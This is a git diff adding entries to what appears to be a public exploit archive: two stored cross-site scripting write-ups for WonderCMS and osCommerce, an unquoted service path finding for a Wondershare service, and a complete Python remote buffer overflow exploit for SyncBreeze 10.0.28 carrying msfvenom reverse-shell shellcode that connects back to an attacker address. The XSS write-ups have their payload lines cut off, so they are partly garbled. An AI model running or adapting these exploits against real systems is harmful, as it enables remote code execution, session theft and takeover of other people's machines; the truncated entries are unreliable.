diff --git a/exploits/php/webapps/49102.txt b/exploits/php/webapps/49102.txt
new file mode 100644
index 000000000..85afb2c42
--- /dev/null
+++ b/exploits/php/webapps/49102.txt
@@ -0,0 +1,22 @@
+# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Mayur Parmar
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: PopOS
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page Title.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page keywords: Mayur">
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49103.txt b/exploits/php/webapps/49103.txt
new file mode 100644
index 000000000..3d78d40cd
--- /dev/null
+++ b/exploits/php/webapps/49103.txt
@@ -0,0 +1,112 @@
+# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
+# Date: 2020-11-19
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.oscommerce.com/
+# Version: 2.3.4.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
+3- Enter the XSS payload into the title section and save it.
+
+==> Vulnerable Parameter <==
+
+title= (post parameter)
+
+==> HTTP Request <==
+
+POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 123
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: osCAdminID=s11ou44m0vrasducn78c6sg
+
+module=newsletter&title=">
&content=xss
+
+==> Vulnerable Source Code <==
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/49101.txt b/exploits/windows/local/49101.txt
new file mode 100644
index 000000000..bafbade3e
--- /dev/null
+++ b/exploits/windows/local/49101.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
+# Date: 2020-11-24
+# Exploit Author: Luis Sandoval
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 10.7.1.321
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Service info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto
+
+C:\Users\user>sc qc ElevationService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElevationService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Wondershare Driver Install Service help
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/webapps/49104.py b/exploits/windows/webapps/49104.py
new file mode 100755
index 000000000..68029247d
--- /dev/null
+++ b/exploits/windows/webapps/49104.py
@@ -0,0 +1,70 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
+# Date: 18-Sep-2020
+# Exploit Author: Abdessalam king(A.salam)
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7,windows xp,windows 10
+#72413372 [*] Exact match at offset 520
+#jmp esp FFE4 \xff\xe4
+#!mona modules
+#!mona find -s "\xff\xe4" -m libspp.dll
+#address esp => 10090C83
+#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
+-b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread
+#!/usr/bin/python
+import socket
+
+shell =""
+shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
+shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf"
+shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9"
+shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc"
+shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0"
+shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5"
+shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5"
+shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76"
+shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b"
+shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60"
+shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1"
+shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2"
+shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1"
+shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b"
+shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3"
+shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3"
+shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5"
+shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8"
+shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83"
+shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d"
+shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45"
+shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77"
+shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0"
+shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16";
+
+
+payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" *
+20 + shell +"\x90"*(1400-520-4-20-len(shell))
+req =""
+req += "POST /login HTTP/1.1\r\n"
+req += "Host: 192.168.1.20\r\n"
+req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0\r\n"
+req += "Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+req += "Accept-Language: en-US,en;q=0.5\r\n"
+req += "Accept-Encoding: gzip, deflate\r\n"
+req += "Referer: http://192.168.1.20/login\r\n"
+req += "Content-Type: application/x-www-form-urlencoded\r\n"
+req += "Content-Length: "+str(len(payload))+"\r\n"
+req += "Connection: keep-alive\r\n"
+req += "Upgrade-Insecure-Requests: 1\r\n"
+req += "\r\n"
+req += payload
+# print req
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",80))
+s.send(req)
+print s.recv(1024)
+
+s.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 29cfa77c7..1760597e3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11206,6 +11206,7 @@ id,file,description,date,author,type,platform,port
49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis MartÃnez",local,windows,
49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
+49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43326,3 +43327,6 @@ id,file,description,date,author,type,platform,port
49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,
+49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
+49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
+49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,